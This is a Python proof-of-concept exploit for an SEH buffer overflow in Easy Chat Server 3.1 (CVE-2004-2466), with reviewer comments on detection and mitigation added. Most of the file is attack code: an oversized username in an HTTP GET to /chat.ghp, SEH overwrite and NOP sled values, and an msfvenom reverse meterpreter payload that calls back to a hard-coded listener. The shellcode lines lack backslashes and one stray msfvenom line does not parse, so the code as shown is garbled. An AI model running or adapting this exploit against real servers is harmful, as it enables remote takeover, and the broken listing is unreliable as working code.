#!/usr/bin/python
# Easy Chat Server 3.1 Remote Exploit (proof of concept)
# Written by r00tpgp @ http://www.r00tpgp.com
# Usage: python easychat-exploit.py <victim-ip> <port>
# Spawns reverse meterpreter LHOST=192.168.0.162 LPORT=1990
# CVE: CVE-2004-2466
# Installer: http://www.echatserver.com/
# Tested on Windows 7 32b SP1
#
# NOTE(review): the original header above was duplicated in the page this
# file was taken from; the duplicate has been collapsed into this one copy.
#
# Review summary (defender's view):
#   * What it is: a single oversized HTTP GET to /chat.ghp whose `username`
#     query parameter overruns a stack buffer and overwrites the SEH record
#     (see the nseh/seh values below), then lands in an msfvenom payload.
#   * Detection: a request to /chat.ghp with a `username` parameter hundreds
#     of bytes long is not normal chat-login traffic; the payload as labelled
#     is a reverse_tcp stager, so a successful run shows up as an outbound
#     connection from the chat server to the hard-coded LHOST:LPORT above.
#   * Mitigation: this is a 2004 bug in version 3.1 of the product; run a
#     fixed release and do not expose the chat server to untrusted networks.
#     The gadget address below lives in SSLEAY32.DLL, which suggests that
#     module is loaded at a fixed address without SafeSEH -- TODO confirm
#     against the affected install.

import sys, socket, time

host = sys.argv[1] # Receive target IP from the command line (no argument check; IndexError if missing)
port = int(sys.argv[2]) # Receive target port from the command line (ValueError if non-numeric)

# Payload generated with:
#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.162 LPORT=1990
# NOTE(review): the next line is a wrapped continuation of the msfvenom
# command above as rendered on this page, not a Python statement; it does
# not parse as code and is left untouched here.
-f python -b "x00x20"
# NOTE(review): as rendered on this page the escape sequences in the
# payload lines below have no backslash prefix, so these literals are
# plain ASCII text; the listing is treated as illustrative only.
buf = ""
buf += "xbex4exddxd4x27xd9xe9xd9x74x24xf4x5bx29"
buf += "xc9xb1x54x31x73x13x83xc3x04x03x73x41x3f"
buf += "x21xdbxb5x3dxcax24x45x22x42xc1x74x62x30"
buf += "x81x26x52x32xc7xcax19x16xfcx59x6fxbfxf3"
buf += "xeaxdax99x3axebx77xd9x5dx6fx8ax0exbex4e"
buf += "x45x43xbfx97xb8xaexedx40xb6x1dx02xe5x82"
buf += "x9dxa9xb5x03xa6x4ex0dx25x87xc0x06x7cx07"
buf += "xe2xcbxf4x0exfcx08x30xd8x77xfaxcexdbx51"
buf += "x33x2ex77x9cxfcxddx89xd8x3ax3exfcx10x39"
buf += "xc3x07xe7x40x1fx8dxfcxe2xd4x35xd9x13x38"
buf += "xa3xaax1fxf5xa7xf5x03x08x6bx8ex3fx81x8a"
buf += "x41xb6xd1xa8x45x93x82xd1xdcx79x64xedx3f"
buf += "x22xd9x4bx4bxcex0exe6x16x86xe3xcbxa8x56"
buf += "x6cx5bxdax64x33xf7x74xc4xbcxd1x83x2bx97"
buf += "xa6x1cxd2x18xd7x35x10x4cx87x2dxb1xedx4c"
buf += "xaex3ex38xf8xa4xa8x03x55xb8x8axecxa4xb9"
buf += "xcdx2ax21x5fx81xe2x62xf0x61x53xc3xa0x09"
buf += "xb9xccx9fx29xc2x06x88xc3x2dxffxe0x7bxd7"
buf += "x5ax7ax1ax18x71x06x1cx92x70xf6xd2x53xf0"
buf += "xe4x02x02xfaxf4xd2xafxfax9exd6x79xacx36"
buf += "xd4x5cx9ax98x27x8bx98xdfxd7x4axa9x94xe1"
buf += "xd8x95xc2x0dx0dx16x13x5bx47x16x7bx3bx33"
buf += "x45x9ex44xeexf9x33xd0x11xa8xe0x73x7ax56"
buf += "xdexb3x25xa9x35xc0x22x55xcbxe4x8ax3ex33"
buf += "xa8x2axbfx59x28x7bxd7x96x07x74x17x56x82"
buf += "xddx3fxddx42xafxdexe2x4fx71x7fxe2x63xaa"
buf += "x96x6dx84x4dx97x8fxb9x9bxaexe5xfax1fx95"
buf += "xf6xb1x02xbcx9cxb9x11xbexb4"

# Overflow layout: 217 bytes of filler reach the SEH record, whose two
# slots (next-SEH pointer, handler pointer) are overwritten by nseh/seh.
junk = "A"*217
nseh = "xebx06x90x90" # short jump 6 bytes (over the handler slot into the NOP sled)
seh = "x86xaex01x10" # pop pop ret 1001AE86 SSLEAY32.DLL -- the overwritten exception handler
nops = "x90"*16 # NOP sled in front of the payload

# The whole thing is delivered as the username of an ordinary chat login.
# NOTE(review): the Host/Referer values are hard-coded to 192.168.1.136 and
# do not follow the <victim-ip> argument; presumably left over from the
# author's lab -- harmless for the overflow but worth knowing when reading
# captures of this traffic.
header = (
"GET /chat.ghp?username=" + junk + nseh + seh + nops + buf +
"&password=&room=1&sex=1 HTTP/1.1 "
"User-Agent: Mozilla/4.0 "
"Host: 192.168.1.136:80 "
"Accept-Language: en-us "
"Accept-Encoding: gzip, deflate "
"Referer: http://192.168.1.136 "
"Connection: Keep-Alive "
)
# One TCP connection, one send, then close: the server never gets a reply
# read, so from the network side this is a single anomalous request.
# NOTE(review): send() is given a str, which matches the Python 2 shebang;
# on Python 3 send() requires bytes -- TODO confirm intended interpreter.
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Create a TCP socket
socket
client.connect((host, port)) # Connect to user supplied port and IP address
client.send(header) # Send the crafted request carrying the oversized username
client.close() # Close the connection; no response is read